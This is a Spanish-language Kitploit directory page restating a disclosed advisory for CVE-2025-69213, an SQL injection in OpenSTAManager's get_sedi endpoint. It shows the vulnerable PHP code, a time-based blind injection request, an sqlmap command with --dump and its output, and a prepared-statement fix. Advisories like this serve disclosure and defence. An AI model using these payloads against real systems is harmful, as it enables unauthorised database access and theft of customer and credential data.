Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-69213 — CVE-2025-69213 - OpenSTAManager tiene una inyección SQL en ajax_complete.php (endpoint get_sedi) | Kitploit
Herramientas/GitHubGitHub/lukasz-rybak/cve-2025-69213
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónSeguridad de Bases de Datos
GitHublukasz-rybak/cve-2025-69213

CVE-2025-69213

CVE-2025-69213 - OpenSTAManager tiene una inyección SQL en ajax_complete.php (endpoint get_sedi)

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-69213: OpenSTAManager tiene una inyección SQL en ajax_complete.php (endpoint get_sedi)

Descripción general

CampoDetalles
ID de CVECVE-2025-69213
GravedadALTA
AvisoVer aviso
Descubierto porLukasz Rybak

Productos afectados

  • devcode-it/openstamanager (versiones: <= 2.9.8)

Clasificación CWE

  • CWE-89: Neutralización incorrecta de elementos especiales utilizados en un comando SQL ('Inyección SQL')

Detalles

Resumen

Existe una vulnerabilidad de inyección SQL en el endpoint ajax_complete.php cuando se gestiona la operación get_sedi. Un atacante autenticado puede inyectar código SQL malicioso a través del parámetro idanagrafica, lo que conduce a un acceso no autorizado a la base de datos.

Prueba de concepto

Código vulnerable

Archivo: modules/anagrafiche/ajax/complete.php:28

root@kitploit:~
case 'get_sedi':
    $idanagrafica = get('idanagrafica');
    $q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione 
          FROM an_sedi 
          WHERE idanagrafica='".$idanagrafica."' ...";
    $rs = $dbo->fetchArray($q);

Flujo de datos

  1. Fuente: $_GET['idanagrafica'] → get('idanagrafica')
  2. Vulnerable: La entrada del usuario se concatena directamente en la consulta SQL con comillas simples
  3. Sumidero: $dbo->fetchArray($q) ejecuta la consulta maliciosa

Explotación

PoC manual (Inyección SQL ciega basada en tiempo):

root@kitploit:~
GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
imagen

Explotación con SQLMap:

root@kitploit:~
sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --dump

Salida de SQLMap:

root@kitploit:~
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12
imagen

Impacto

  • Exfiltración de datos: Extracción completa de la base de datos, incluidas credenciales de usuario, datos de clientes y registros financieros
  • Escalada de privilegios: Modificación de la tabla zz_users para obtener acceso de administrador
  • Integridad de los datos: Modificación o eliminación no autorizada de registros
  • Posible RCE: Mediante SELECT ... INTO OUTFILE si los permisos de archivo lo permiten

Versiones afectadas

  • OpenSTAManager: Verificado en la última versión (a diciembre de 2025)
  • Es probable que todas las versiones que utilizan este endpoint estén afectadas

Remediación

Reemplace la concatenación directa por sentencias preparadas:

Antes:

root@kitploit:~
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";

Después:

root@kitploit:~
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";

Referencias

  • OWASP Inyección SQL: https://owasp.org/www-community/attacks/SQL_Injection
  • CWE-89: Neutralización incorrecta de elementos especiales utilizados en un comando SQL

Créditos

Descubierto por: Łukasz Rybak

Referencias

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-w995-ff8h-rppg
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69213
  • https://github.com/advisories/GHSA-w995-ff8h-rppg

Descargo de responsabilidad

Este CVE fue divulgado de manera responsable siguiendo prácticas de divulgación coordinada de vulnerabilidades. La información aquí proporcionada es solo con fines educativos y defensivos.

Descargar herramienta